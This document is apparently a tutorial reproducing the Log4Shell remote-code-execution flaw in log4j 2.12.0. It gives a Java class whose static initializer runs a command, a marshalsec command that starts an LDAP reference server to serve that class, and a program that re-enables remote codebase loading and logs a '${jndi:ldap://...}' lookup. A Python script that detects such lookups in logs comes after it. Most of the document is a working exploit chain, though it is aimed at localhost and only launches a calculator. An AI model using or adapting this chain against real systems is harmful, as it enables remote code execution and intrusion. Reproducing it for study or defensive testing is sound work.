compile
public class Exploit {
    // Static initializer: runs as soon as the JVM loads this class
    static {
        try {
            String[] cmd = { "calc" };
            Runtime.getRuntime().exec(cmd).waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
Put Exploit.class in the root directory of an HTTP server, then use marshalsec to create the JNDI service (the command below starts its LDAP reference server):
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:12345/#Exploit
Create a new project and add the affected log4j2 packages as dependencies:
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.12.0</version>
</dependency>
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-api</artifactId>
    <version>2.12.0</version>
</dependency>
Create the following code (remember to load the log4j2 configuration)
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Main {
    private static final Logger logger = LogManager.getLogger();

    public static void main(String[] args) {
        // Re-enable remote codebase loading, which newer JDKs turn off by default
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
        // The logged message contains a JNDI lookup that log4j2 resolves
        logger.error("${jndi:ldap://127.0.0.1:1389/exploits}");
    }
}
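For the defensive side, here is an added example (not code from the original article): a Python script that scans log lines for the `${jndi:...}` lookup logged by Main above and tallies the LDAP/RMI destinations it names, so they can be compared against egress and DNS records. The function names, the sample log lines and the 192.0.2.10 address are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Literal lookup form used on this page: ${jndi:<scheme>://<host>:<port>/<name>}.
# Case-insensitive, tolerant of spaces after "${" and around "jndi:".
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([^}\s]+)\s*\}", re.IGNORECASE)
REMOTE_SCHEMES = {"ldap", "rmi"}  # the two JNDI providers this page deals with

def find_jndi_lookups(line):
    """Return one dict per ${jndi:...} lookup found in a single log line."""
    hits = []
    for match in JNDI_LOOKUP.finditer(line):
        target = match.group(1)
        scheme = target.partition(":")[0].lower() if ":" in target else ""
        host = port = None
        try:
            parts = urlsplit(target)
            host = parts.hostname
            port = parts.port          # ValueError on a non-numeric port
        except ValueError:
            pass                       # keep the hit even if the authority is malformed
        hits.append({"target": target, "scheme": scheme, "host": host, "port": port,
                     # a local name such as java:comp/env/... is not a network lookup
                     "remote": scheme in REMOTE_SCHEMES})
    return hits

def remote_destinations(lines):
    """Count the (scheme, host, port) triples that log lines asked JNDI to contact."""
    seen = Counter()
    for line in lines:
        for hit in find_jndi_lookups(line):
            if hit["remote"]:
                seen[(hit["scheme"], hit["host"], hit["port"])] += 1
    return seen

# Constructed sample log lines (not taken from a real system).
SAMPLE_LOG = [
    "10:00:01 ERROR Main - ${jndi:ldap://127.0.0.1:1389/exploits}",
    "10:00:02 ERROR Main - ${JNDI:rmi://192.0.2.10:1099/obj}",
    "10:00:03 INFO  Main - datasource is ${jndi:java:comp/env/jdbc/app}",
    "10:00:04 INFO  Main - started in 2.1 s",
    "10:00:05 ERROR Main - ${jndi:ldap://127.0.0.1:1389/exploits}",
]

if __name__ == "__main__":
    for dest, count in remote_destinations(SAMPLE_LOG).items():
        print(dest, count)
```

The pattern covers only the literal lookup form shown on this page, so treat a clean result as a lower bound rather than proof of absence.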